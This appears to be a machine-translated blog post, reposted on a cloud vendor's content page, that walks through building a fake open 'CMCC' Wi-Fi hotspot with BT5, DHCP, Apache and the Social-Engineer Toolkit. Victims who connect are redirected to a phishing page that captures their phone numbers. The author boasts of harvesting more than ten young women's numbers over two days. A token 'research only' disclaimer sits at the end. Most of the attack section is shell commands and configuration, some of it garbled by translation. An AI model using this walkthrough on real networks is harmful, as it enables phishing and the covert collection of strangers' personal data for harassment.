How can I use my mind to get the mobile phone number of a nearby beauty?

Source: Internet
Author: User

It was a dark night, and I walked with my friends on the way home. Below ...... No, haha ...... I am the title party!

To put it bluntly, my friends and I lived close to a famous art university and came home from work one night. When I opened the door, I met several beautiful women and found them living on the opposite side of us, this group of IT friends is very excited. I 'd like to say, "I'm a computer mechanic. Your computer is slow. Can I help you with it for free ?".

YY belongs to YY, but this group of people engaged in IT are relatively restrained. How can we take the initiative to talk about IT, because we are all people with ID cards. It was not calm to go back to the house, so I thought for several minutes. "We are sorry to ask them, why don't they let us take the initiative ?"

We don't have a CMCC signal nearby, so we want to build a free CMCC so that they can take the initiative to enter the mobile phone number for authentication. The following is the implementation plan.

Preparation: wireless network adapter (8137), bt5, phishing page

1. Insert a wireless network adapter into BT5, start the network adapter, and assign an ip address to eth0.

# Ifconfig eth0 up

# Ifconfig wlan0 up

# Ifconfig eht0 192.168.10.2/24

Ii. Install dhcp and configuration below

# Apt-get install dhcp3-server

# Vi/etc/default/dhcp3-server

SetINTERFACES="eth0" Change to INTERFACES = "at0"

# Vi/etc/dhcp3/dhcpd. conf? Paste the following content or change it to the desired CIDR block.

Default-lease-time 600;

Max-lease-time 7200;

Option subnet-mask limit 255.0;

Option broadcast-address 192.168.10.255;

Option routers 192.168.10.2;

Option domain-name-servers 192.168.10.1;

Option domain-name "www.metasploit.cn ";

Subnet 192.168.10.0 netmask 255.255.255.0 {

Range 192.168.10.10 192.168.10.100;

}

3. Start apache and configure phishing pages

#/Etc/init. d/apache2 start

# Cd/var/www // enter the website directory. the first page of apache.pdf in bt5is index.html.

# Vi index.html // modify it to your own phishing page. Here, for demonstration, I inserted the basic phishing

In BT5, I installed the XSS platform. The Ip address here should be noted that it should be the same as the ip address segment we just allocated in the dhcp configuration file; otherwise, others will be connected and cannot access it;

Of course, you can also forge it into a mobile CMCC page!

4. The preparation is almost done. The Artifact should be dispatched.

# Cd/pentest/exploits/set/

#./Set

Select the first set> 1

1) Social-Engineering Attacks

Next step

Select the first set> 8

8) Wireless Access Point Attack Vector

Next step

Set: wireless> 1 // select 1 to start

Will prompt you to edit the dhcp3-server file. Press Ctrl + x? Exit directly, because we have edited it before.

Next step

Select the allocated Ip segment

Set: wireless> 2

Enter the wireless network interface (ex. wlan0): wlan0 // select wlan0

(I forgot to say one, # vi/pentest/exploits/set/config/set_config.py? Change to the name of the AP you want. Here I will change it to CMCC)

The following figure shows the effect:

Connecting to the AP without entering a password to open any website will jump to my phishing page

Mobile UC login Effect

Summary:

After two days of fishing, I caught more than 10 "beauty" mobile phone numbers. The effect is good. If it is forged into a cmcc login page, the effect will be better!

(Only for technical research. Do not use it for other purposes !!! At your own risk)

Source: http://www.metasploit.cn

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.